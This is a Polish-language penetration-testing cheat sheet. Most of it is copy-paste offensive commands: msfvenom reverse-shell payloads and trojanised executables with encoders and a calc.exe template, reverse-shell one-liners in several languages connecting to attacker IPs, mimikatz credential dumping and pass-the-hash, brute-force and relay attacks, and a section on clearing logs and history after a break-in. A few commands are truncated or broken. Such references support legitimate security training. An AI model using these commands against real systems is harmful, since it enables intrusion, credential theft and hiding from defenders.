PENTEST NOTE === ###### tags: `pentest`  # 1. Rekonesans ## 1.1 Shodanhq FILTRY: * `After/before` – ustawienia daty * `Country` - kraj * `City` - miasto * `Hostname` – nazwa hosta * `Net` – ip lub subnet * `Os` – system operacyjny * `Port` – port `net:17.0.0.0/8` - sieć apple - `has_screenshot: yes country:pl` (VNC) - `has_screenshot: yes country:pl camera` :::info insecam.com ::: ## 1.2 theharvester Wyszukanie 500 pierwszych wyników dla wybranej domeny z pośród wszystkich dostępnych portali. `# theharvester –d <domena> -l 500 –b all` ## 1.3 DNS ### 1.3.1 nslookup: - Tryb interaktywny: ``` # nslookup Default Server: 192.168.1.1 Address: 192.168.1.1 >> set type=a >> www.firma.pl name: www.firma.pl address: 10.10.10.100 ``` ### 1.3.2 host: `# host –t [typ] <domena> [server]` ### 1.3.3 Polecenie dig: ``` # dig [@server] [-opcje] {name} [type] # dig <target domain name> ns ``` ### 1.3.4 Transfer strefy: 1. Transfer strefy za pomocą polecenia host `# host –l –v –t any <domena> <server>` 2. Transfer strefy za pomocą polecenia dig `# dig @<server> <domena> axfr > dig_zone.txt` ## 1.4. Wyszukiwanie katalogów ### 1.4.1 gobuster - `gobuster -u http://10.10.10.79/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 302,307,200,204,301,403 -x sh,pl` ### 1.4.2 dirb - `dirb http://10.10.10.79` ### 1.4.3 wfuzz - `wfuzz -c -z file,/root/necromancer/thing.txt — hc 404 http://192.168.56.102/amagicbridgeappearsatthechasm/FUZZ` - `wfuzz -u http://academy.htb/FUZZ.php -w /usr/share/wordlists/wfuzz/general/common.txt --hc 404,403 -t 100` ### 1.4.4 dirsearch - `dirsearch -u http://10.10.10.79 -w /usr/share/wordlists/dirb/small.txt -e php,asp` ## 1.5 recon-ng ### Using * Pomoc `help -option-` * Użycie modułu `use recon/<category>/<module>` * Opcje modułu `show options` * Ustawianie opcji `set <OPTION> <VALUE>` * Wylistowanie modułów `show modules` * Dodawanie klucza API `keys add shodan_api < insert shodan api key here > ` # 2. Skanowanie ## 2.1 nmap - Nazwa usługi `#nmap -p smtp <target>` - Wszystkie porty `#nmap -p- <target>` - Specyficzne porty dla proto `#nmap -pT:25,U:53 <target>` #### Nmap network sweeping 1. `Nmap –p 139 192.168.1.*` 2. Zapisanie do formatu grep `Nmap –p 139 192.168.1.* -oG 139.txt` 3. `cat 139.txt` 4. Jeśli checmy szybko poznac same adresy `cat 139.txt | grep open | cut –d „ „ –f2` #### Skrypty nmap * Przełączniki –sC oraz --script :::info Samo `–sC` używa skryptów z grupy default ::: - Pomoc i informacje na temat skryptów `--script-help <script>` Grupy: * Discovery * Exploit * Fuzzer * Vuln `#nmap -sV --script vuln <target>` * Version * Safe * Dos * Auth - Wszystkie skrypty z wybranych grup `#nmap -sV --script="version,discovery" <target>` - Wszystkie skrypty z wybranych grup bez jednej konkretnej `#nmap -sV --script "not exploit" <target>` - Wszystkie skrypty HTTP `#nmap -sV --script "(http-*)" <target>` - Wszystkie skrypty HTTP oprócz http-xssed i http-wordpress-users `#nmap -sV --script "(http-*) and not(http-xssed or http-wordpress-users)" <target>` - Debug. Stack trace `#nmap -sV --script exploit -d3 --script-trace <target>` :::info Zmiana poziomu debug flagą `-d[1-9]` ::: ##### Porównywanie wyników skanowania Do porównania używamy programu `ndiff`. Wcześniej skanowania zapisujemy do pliku np XML `-oX <filename>` np: 1) `#nmap -sn 192.168.50.0/24 -oX skan1` 2) `#nmap -sn 192.168.50.0/24 -oX skan2` 3) `ndiff skan1 skan2` `skan1` traktowany jest jako szablon. `[+]` oznacza nowe linie, `[-]` oznacza usunięte linie. #### vulscan `nmap -sV --script=vulscan/vulscan.nse <cel>` Single Database Mode `nmap -sV --scipt=vulscan/vulscan.nse --script-args vulscandb=exploitdb.csv <cel>` ## 2.2 hping3 - <to do> ## 2.3 unicornscan #### Opcje ``` SYN : -mT ACK scan : -mTsA Fin scan : -mTsF Null scan : -mTs Xmas scan : -mTsFPU Connect Scan : -msf -Iv scan with all options : -mTFSRPAUEC Syn + osdetect : -eosdetect -Iv (-mT) scan ports 1 through 5 : (-mT) host:1-5 ----------------------------------------------------- -mU : is mode UDP -mT : is mode TCP -I : Display Immediately 192.168.100.1 : target IP :53,80,443 : ports -r200 : 200 Packets per second ``` ##### 1. Proste skanowanie TCP SYN ``` root@kali:~# unicornscan 172.16.215.132 TCP open http[ 80] from 172.16.215.132 ttl 128 TCP open epmap[ 135] from 172.16.215.132 ttl 128 TCP open netbios-ssn[ 139] from 172.16.215.132 ttl 128 TCP open microsoft-ds[ 445] from 172.16.215.132 ttl 128 ``` ##### 2. UDP Skan ``` root@kali:~# unicornscan -mU -r200 -I 192.168.100.1:53 UDP open 192.168.100.1:53 ttl 128 UDP open domain[ 53] from 192.168.100.1 ttl 128 ``` ##### 3. TCP Port Skan `root@kali:~# unicornscan -r500 -mT 192.168.100.1/24:80,443,445,339` ##### 4. Praktyczny przykład Skanowanie mysql z portami http i https ``` root@kali:~# unicornscan -r200 -Iv -eosdetect -mT 172.16.215.1:3306,80,443 TCP open 172.16.215.1:80 ttl 64 ST 1 IP TTL 64 TOS 0x00 [DF] TCP WS 65535 urg_ptr 0000 TCP open 172.16.215.1:3306 ttl 64 sender statistics 197.8 pps with 3 packets sent total listener statistics 6 packets received 0 packets droped and 0 interface drops TCP open http[ 80] from 172.16.215.1 ttl 64 OS `' TCP open mysql[ 3306] from 172.16.215.1 ttl 64 OS `' ``` ## 2.3 Scapy `>>> send(IP(dst="10.1.99.2")/ICMP()/"HelloWorld")` `send(IP(src="10.1.99.100", dst="10.1.99.2")/ICMP()/"HelloWorld")` * `sr()` - The sr() function is for sending packets and receiving answers. The function returns a couple of packet and answers, and the unanswered packets. * `sr1()`- This function is a variant that only returns one packet that answered the sent packet (or the packet set) sent ``` >>> h=sr1(IP(dst="10.1.99.2")/ICMP()) Begin emission: .Finished to send 1 packets. * Received 2 packets, got 1 answers, remaining 0 packets ``` * `>>> h.show()` - żeby zobaczyć pakiet ``` >>> p=sr(IP(dst="10.1.99.2")/TCP(sport=666,dport[22,80,21,443],flags="S")) Begin emission: ***Finished to send 4 packets. * Received 4 packets, got 4 answers, remaining 0 packets ``` Więcej niż jeden port dajemy w `[]` ``` >>> p >>> (<Results: TCP:4 UDP:0 ICMP:0 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>) ``` Żeby zobaczyć wyniki z `sr()` lub `sr1()` ``` >>> ans,unans=_ >>> ans.summary() IP / TCP 10.1.99.25:666 > 10.1.99.2:ssh S ==> IP / TCP 10.1.99.2:ssh > 10.1.99.25:666 SA/ Padding IP / TCP 10.1.99.25:666 > 10.1.99.2:http S ==> IP / TCP 10.1.99.2:http > 10.1.99.25:666 SA / Padding IP / TCP 10.1.99.25:666 > 10.1.99.2:ftp S ==> IP / TCP 10.1.99.2:ftp > 10.1.99.25:666 RA / Padding IP / TCP 10.1.99.25:666 > 10.1.99.2:https S ==> IP / TCP 10.1.99.2:https > 10.1.99.25:666 RA / Padding ``` #### ARP ``` >>> ans,unans=sr(ARP(hwsrc="08:00:27:66:4d:84",psrc="192.168.1.102",pdst="192.168.1.103")) >>> ans.summary() ARP who has 192.168.1.103 says 192.168.1.102 ==> ARP is at 08:00:27:93:19:12 says 192.168.1.103 / Padding ``` ## 2.4 netcat `# nc -n -v -z -w 1 <ip> 1-1024` `-n` - jedynie adresy IP, bez DNS `-v` - verbose `-z` - zero-I/O mode [używane do skanowania] `-w` - opóźnienie w sek. `1-1024` - zakres portów # 3. Enumeracja :::danger Linki: - [Local Linux Enum](https://www.rebootuser.com/?p=1623) - [Windows Enum](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/) - [AutoRecon](https://github.com/Tib3rius/AutoRecon) - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) ::: ## 3.1 SNMP Zmiana wyników SNMP na bardziej czytelne: ``` apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf ``` `snmpcheck -t 192.168.1.X -c public` `snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f` `snmpenum -t 192.168.1.X` `onesixtyone -c names -i hosts` ## 3.2 LinEnum [LinEnum - github](https://github.com/rebootuser/LinEnum) ## 3.3 LPC [linuxprivchecker - github](https://github.com/oschoudhury/linuxprivchecker) ## 3.4 linux-smart-enumeration [lse.sh](https://github.com/diego-treitos/linux-smart-enumeration) one-liner: `wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh` `curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh;chmod 700 lse.sh` ## 3.5 ICMP Timestamp Request ``` # ping -T tsonly <IP> ``` Przykładowy wynik: ``` PING <IP> (<IP>) 56(124) bytes of data. 64 bytes from <IP>: icmp_seq=1 ttl=64 time=0.040 ms TS: 44567155 absolute 0 0 0 ``` Co coznacza: # 4. Atak ## 4.1 Hasła ### 4.1.1 John #### 1. Generowanie hashu `echo -n password | md5sum | tr -d " -"` lub skryptem bash z pliku ``` for i in $(cat wordlist); do echo -n "$i"| md5sum | tr -d " -" >> hashes; done ``` * `john --show --format=raw-md5 <hash.file>` #### 2. Generowanie hashu z solą ###### 1. openssl `openssl passwd -1 -salt <sól> <password>` ###### 2. mkpasswd `mkpasswd -m md5 -S <sól> <password>` ### 4.1.2 Hashcat `hashcat -a 0 -m 0 hashfile.txt wordlist.lst --force` ``` -h | --help -a | --attack-mode -m | --hash-type -o | --output-file ``` #### Atak z maską * Wbudowane zestawy znaków ``` ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xff ``` * Niestadardowe zestawy znaków ``` -1, --custom-charset1=CS User-defined charsets -2, --custom-charset2=CS Example: -3, --custom-charset3=CS --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef -4, --custom-charset4=CS -2 mycharset.hcchr : sets charset ?2 to chars contained in file ``` w przypadku zapisu `-1 ?u -2 ?u?l?d -3 ?d` oznacza: ``` Charset Contains the charcters -1 ABCDEFGHIJKLMNOPQRSTUVWXYZ -2 abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789 -3 0123456789 ``` * Dla hasła `B4nan1` maska może wyglądać tak `?1?1?2?2?2?3` * Cały zapis może być następujący `# hashcat -a 3 -m 0 -1 ?u -2 ?u?l?d -3 ?d hash ?1?1?2?2?2?3` ##### - - increment argument W przypadku maski `?1?1?2?2?2?3` program będzie próbował tylko haseł o dł. 6. By sprawdzić wszystkie możliwe kombinacje od 1 do 6 używamy argumentu `--increment`,`-i`. W tym przypadku będzie wyglądało to następująco: ``` ?1 ?1?1 ?1?1?2 ?1?1?2?2 ?1?1?2?2?2 ?1?1?2?2?2?3 ``` By ustalić minimalną lub maksymalną wartość używamy: ``` --increment-min=NUM | --increment-min=4 --increment-max=NUM | --increment-max=8 ``` ### 4.1.3 Hydra Jak używać: 1. Wybieramy cel. Mamy 3 opcje a. Single target –podajemy IP b. Network range – CIDR np. 192.168.0.0/24 c. Lista 2. Wybieramy protokół 3. Sprawdzamy czy protokół ma dodatkowe parametry np `hydra –U <PROTOCOL> smtp` 4. Port docelowy **OPCJONALNIE**. Jak nie jest ustawiony to leci port domyślny dla protokołu. ``` >Brute Force > Opcja –x -x min_length:max_length:charset > Charset: a – dla małych A - dla dużych 1 – dla cyfr I wszystkiego innego ``` #### Hydra Brute-Force Web Auth :::info Na przykładzie metasploitable2 ::: Simple ``` hydra -l <login> -P <słownik> <IP> http-post-form "<scieza>:username=^USER^&password=^PASS^:Error" ``` ##### - hydra-gtk ##### - hydra ``` hydra -V -l admin -P <słownik> -e n -t 1 -f -m /dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed <IP> http-post-form ``` `-V` - Verbose mode `-l` - login `-P` - plik z haslami (w tym przykładzie: `/usr/share/wordlists/metasploit/unix_passwords.txt`) `-e` - dodatkowe sprawdzenie (`n` - null password, `s` - login jako pass, `r` - odwrócenie loginu) `-t` - ilość wątków `-f` - wyjście po pierwszym znalezieniu login/pass `-m` - opcje modułu #### Hydra postgres Brute-Force :::info Na przykładnie metasploitable2 ::: ``` hydra -V -l postgres -P /usr/share/wordlists/metasploit/unix_passwords.txt -e ns -t 16 -f <IP> postgres ``` ### 4.1.4 Tęczowe tablice 1) **Zdefiniowanie funkcji redukucjącej** W przykładzie FR będzię tworzyć nowe hasło poprzez wzięcie 4-ech pierwszych cyfr z hasha. Funckja ogranicza się do łamania haseł które: - składają się z 4 znaków - znaki hasła to tylko cyfry - będzie błąd , gdy hash nie będzie miał przynajmniej 4 cyfr 2) **Wyliczenie wartości dla Tęczowej Tablicy** Bierzemy przykładowe hasło: `1729` Liczony jest hash. ``` echo -n 1729 | md5sum 25e2a30f44898b9f3e978b1786dcd85c ``` Do otrzymanego hasha stosujemy FR. Wynik będzie następujący: `2523` W kolejnych krokach postępuje się analogicznie: `MD5 -> FR -> PASS -> MD5 -> FR ...` :::info Dla przykładu kończymy na wartości MD5 z hasła 0963 ``` echo -n 0963 | md5sum d1cbdbc9cacee6c8b133c7a92a83bcca ``` ::: 3) **Kompresja** [pierwszy wpis];[ostatni hash];[ilość iteracji] `1729;d1cbdbc9cacee6c8b133c7a92a83bcca;5` Taki wpis ląduje w tablicy 4) **Wyszukiwanie w Tęczowej Tablicy** * Mamy do znalezienia hash,np: `99503bdd3c5a4c4671ada72d6fd81433` * Nie ma go w naszej 1-elemntowej tablicy. Uzyjmy Funkcji Redukującej. W wyniku otrzymamy: `9950` * Tego też nie ma, więcej ponownie używamy FR aż do momentu gdy otrzymamy hash: `d1cbdbc9cacee6c8b133c7a92a83bcca` * Trafiliśmy. Ten hash znajduje się z naszej tablicy. Odnaleźliśmy więc element gdzie zaszyta jest inf. o tym hashu. * Aby sprawdzić z jakiego hasła został wygenerowany hash, rozpoczynamy hashowanie od pierwszego hasła aż znajdziemy hasło. `echo -n 1729 | md5sum` `25e2a30f44898b9f3e978b1786dcd85c` ... `echo -n 6259 | md5sum` `99503bdd3c5a4c4671ada72d6fd81433` ### 4.1.5 Generowanie słowników #### 4.1.5.1 Crunch `crunch <min znaków> <max znaków> <znaki> -t <maska np S@cr@@ dla Secr3t> -o <output>` Pokazać rozmiary słownika 1) `crunch 3 5 abcd` 2) `crunch 3 5 abcdefghijklmnoprstuwxyz` 3) `crunch 8 8 as@$0 -t P@@@w@rd` #### 4.1.5.2 CUPP `# git clone https://github.com/Mebus/cupp.git` `# python cupp.py –i` ## 4.2 Metasploit - Bazy danych ``` # postgresql start` # msfdb init > db_status ``` - Workspace `Workspace –a lab1` `Workspace –d lab1` - Przełączenie sie `Workspace lab1` - Zmiana nazwy `Workspace –r lab1 lab2` - Import danych `db_import /root/nmap-scan.xml` - Export danych `msf db_export –f xml /root/test.xml` - Syntax - Pokaż moduły Auxiliary `show auxiliary` - Use a module ``` use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass ``` - Informacje o module `info` - Opcje modułu `show options` - Ustawianie opcji ``` set RHOSTS 192.168.1.1-254 set THREADS 10 ``` - Uruchamianie modułu `run` - Uruchamianie exploita `exploit` - Wyszukiwanie modułu `search type:auxiliary login` - Skanowanie nmap `db_nmap –sV 192.168.1.25` - Podgląd `Hosts` - Bazy i wyciaganie danych - Tylko wybrane kolumny `Hosts -c address,os_name,state` - Wyszukiwanie `Hosts –S ` - Dodanie hostów do skanu `hosts address,os_name –S Windows –R` lub `services -p 443 --rhosts` - Dodanie wszystkich hostów `hosts -R` - Services –h ``` >services –c name,info,state <ip> >services –c name,info –S http ``` - Wyszukiwanie po porcie: `>services –c name,info –p 445` ### Exploity z exploitdb ``` # searchsploit <nazwa> # /usr/share/exploitdb/ ``` ### Msfvenom 1. Wyświetlanie dostępnych payloadów `# msfvenom –l payloads` 2. Wyświetlanie opcji payload `# msfvenom –p <payload> --payload-options` 3. Ustawianie opcji I format `# msfvenom –p <payload> LHOST=… LPORT=… -f exe > exp1.exe` Z urzyciem encoder `# msfvenom –l encoders` 1. Ustawienie trojana z encoderem I ilością iteracji `# msfvenom –p <payload> LHOST=… LPORT=… -e x86/shikata_ga_nai –i 200 –f exe > exp2.exe` :::info shikata ga nai - nic na to nie poradzisz ::: Użycie –template 1. Pobrać np calc.exe `# msfvenom –p <payload> LHOST=… LPORT=… -f exe –x ./calc.exe > exp3.exe ` 2. Z dodatkiem –k żeby zostawić aktualny program `# msfvenom –p <payload> LHOST=… LPORT=… -f exe –x ./calc.exe -k > exp3.exe ` :::info Podłączenie się po smb: `smbclient //<ip>/c$ -U administrator` ::: Creating Meterpreter Shells with MSFVenom - *Linux* `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf` *Windows* `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe` *Mac* `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho` **Web Payloads** *PHP* `msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` lub `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage: `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php` *ASP* `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp` *JSP* `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp` *WAR* `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war` **Scripting Payloads** *Python* `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py` *Bash* `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh` *Perl* `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl` **Shellcode** For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. *Linux Based Shellcode* `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` *Windows Based Shellcode* `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` *Mac Based Shellcode* `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` **Handlers** Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. ``` use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z ``` Once the required values are completed the following command will execute your handler – `msfconsole -L -r ` ### exploit_suggester `post/multi/recon/local_exploit_suggester` ## 4.3 Pivoting ### 4.3.1 SSH Pivoting ``` ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip ``` Add socks4 127.0.0.1 1010 in /etc/proxychains.conf SSH pivoting from one network to another: ``` ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1 ``` Add socks4 127.0.0.1 1010 in /etc/proxychains.conf ``` proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2 ``` Add socks4 127.0.0.1 1011 in /etc/proxychains.conf ## 4.4 mimikatz ### 4.4.1 Popularne komendy ``` - CRYPTO::Certificates – listing/export certyfikatów - KERBEROS::Golden – utwórz złote / srebrne / zaufane bilety - KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”. - KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust). - LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC. - LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt” - LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer. - LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest). - MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016. - MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials. - MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password. - PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands). - SEKURLSA::Ekeys – list Kerberos encryption keys - SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account) - SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data - SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials. - SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash - SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). - TOKEN::List – list all tokens of the system - TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box - TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials. - EVENT::Clear - czyszczenie logów ``` ### 4.4.2 Mimikatz komendy Mimikatz można uruchomić także za pomocą komendy i wyjśc - `PS C:\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit` Mimikatz z poziomu metasploita: - `meterpreter > mimikatz_command -f sekurlsa::logonPasswords` - `meterpreter > mimikatz_command -f sekurlsa::searchPasswords` ##### PTH `sekurlsa::pth /user:Administrator /domain:MSEDGEWIN10 /ntlm:fc525c9683e8fe067095ba2ddc971889 /run:"powershell -w hidden"` ## 4.5 LLMNR Poisoning ### Info A LLMNR & NBT-NS Spoofing Attack is a classic internal network attack that still works today, due to low awareness and the fact it's enabled by default in Windows. #### What is LLMNR & NetBIOS Name Server Broadcast? When a DNS name server request fails Microsoft windows systems use Link-Local Multicast Name Resolution (LLMNR for short) and the Net-BIOS Name Service (NBT-NS) for fallback name resolution. #### What's the issue with LLMNR & Netbios NS Broadcasting? If the DNS name does not resolve, the client performs a unauthenticated UDP broadcast to the network asking if any other system has the name it's looking for. The fact this process is unauthenticated and broadcasted to the whole network allows any machine on the network to respond and claim to be the target machine. #### What is a LLMNR / NBT-NS Poisoning Attack? By listening for LLMNR & NetBIOS broadcasts it's possible to masquerade as the machine (spoof) the client is erroneously trying to authenticate with. After accepting the connection it's possible to use a tool like Responder.py or Metasploit to forward on requests to a rogue service (like SMB TCP: 137) that performs the authentication process. During the authentication process the client will send the rogue server a NTLMv2 hash for the user that's trying to authenticate, this hash is captured to disk and can be cracked offline with a tool like Hashcat or John the Ripper (TJR) or used in a pass-the-hash attack.LLMNR and NBT-NS are enabled by default in Windows and with awareness of this attack being fairly low you stand a good chance of being able to gather credentials on an internal penetration test. Leave Responder.py running during an engagement while you're working other attack vectors ### Responder `# responder -I eth0 -rdw -v` ## 4.6 Pass the Password/Pass the Hash `# crackmapexec` ## 4.7 Token Impersonation ``` meterpreter > load incognito meterpreter > list_tokens meterpreter > impersonate_token <user> ``` ## 4.8 SMB Relay #### Requirements * SMB must be disabled on the target * Relayed user creds must be admin on machine #### Atak 1. Wyłączenie w rsponder.conf `HTTP Server` oraz `SMB Server` 2. `# responder -I eth0 -rdw -v` 3. Równolegle odpalenie [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) `python ntlmrelayx.py -tf targets.txt -smb2support` ## 4.9 Kerberoasting  ### Intro User logs on with username & password. - 1a. Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request (AS-REQ). - 1b. The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT). - 2. The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data. - 3. The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum — If the DC can open the ticket & the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket. - 4. The TGS is encrypted using the target service accounts’ NTLM password hash and sent to the user (TGS-REP). - 5. The user connects to the server hosting the service on the appropriate port & presents the TGS (AP-REQ). The service opens the TGS ticket using its NTLM password hash. - 6. If mutual authentication is required by the client (think MS15–011: the Group Policy patch from February that added UNC hardening). Unless PAC validation is required (rare), the service accepts all data in the TGS ticket with no communication to the DC. ### GetUserSPNs `python GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <ip> -request` # 5. Utrzymanie dostępu ## 5.1 Reverse Shells ### Bash `bash -i >& /dev/tcp/10.0.0.1/8080 0>` ### PERL `perl -e 'use Socket;$i="192.168.1.102";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'` ### Python ` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ` ### PHP `php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ` ### Ruby `ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ` ### Netcat `nc -e /bin/sh 10.0.0.1 1234` If you have the wrong version of netcat installed, that you might still be able to get your reverse shell back like this: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f` ## 5.2 Bind Shells `nc -e /bin/sh 192.168.1.102 4444` ## 5.3 Inne #### Spawn Shell Gdy mamy /bin/sh za pomocą tego polecenia możemy wywołać basha: - Python `python -c 'import pty; pty.spawn("/bin/bash")'` `python3 -c 'import pty; pty.spawn("/bin/bash")'` - `echo os.system('/bin/bash')` - `/bin/sh -i` - `perl —e 'exec "/bin/sh";'` - `perl: exec "/bin/sh";` - `ruby: exec "/bin/sh"` - `lua: os.execute('/bin/sh')` - (From within IRB) `exec "/bin/sh"` - (From within vi) `:!bash` - (From within vi) `:set shell=/bin/bash:shell` - (From within nmap) `!sh` #### stty raw Gdy mamy shell ale `tab` nie działa i `vim` czy `nano` 1. `CTRL-Z` 2. `stty raw -echo` 3. `fg` # 6. Zatarcie śladów ## 6.1 Linux W środowisku linuksowym, logi trzymane są w katalogu `/var/log`. Dobrym sposobem jest zmiana wielkości zmiennej `$HISTSIZE` która określa wielkość pliku z historią basha. Możną ją podejrzeć wykonując polecenie `#echo $HISTSIZE` Oraz zmienić tę wartość na 0: `#export HISTSIZE=0` Od tego momentu nic nie będzie zapisywane do pliku `~/.bash_history.` :::info Czynność ta najlepiej wykonać od razu po włamaniu po czym przywrócić jej domyślną wartość. ::: ## 6.2 Windows ### 6.2.1 Auditpool `auditpool /disable` ### 6.2.2 Meterpreter `meterpreter > clearev` # 7. Web ### HTTP Code | Code | Opis| Znaczenie | | -------- | -------- | -------- | | 200 | OK | Zawartość żądanego dokumentu | | 301 | Moved perm.|Zasób zmienił swój URI| | 302 | Found | Chwilowo dostępny pod innym adresem| | 400 | Bad Request | Nieprawidłowe zapytanie, np błąd składni | | 401 | Unauthorized | Żądanie zasobu który wymaga uwierzytelnienia| | 403 | Forbidden | Serwer zorzumiał zapytanie. Konfiguracja bezp. zabrania zwrócić mu zasób| | 404 | Not Found | Serwer nie odnalazł zasobu według podanego URL ani niczego co by wskazywało na istnienie takiego zasobu w przeszłości | ## SQLi ### sqlmap ``` --dbs Enumerate DBMS databases -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") ``` `#sqlmap -u <link> --dbs` `#sqlmap -u <link> -D <Database>` `#sqlmap -u <link> -D <Database> -T <table> --dump` # 8. Linux ## 8.1 Uprawnienia Linux | R | W | X | | |---|---|---|---| | 0 | 0 | 0 | 0 | | 0 | 0 | 1 | 1 | | 0 | 1 | 0 | 2 | | 0 | 1 | 1 | 3 | | 1 | 0 | 0 | 4 | | 1 | 0 | 1 | 5 | | 1 | 1 | 0 | 6 | | 1 | 1 | 1 | 7 | ### chmod * `chmod [u,g,o]+[r,w,x] <plik.sh>` - `u` - user 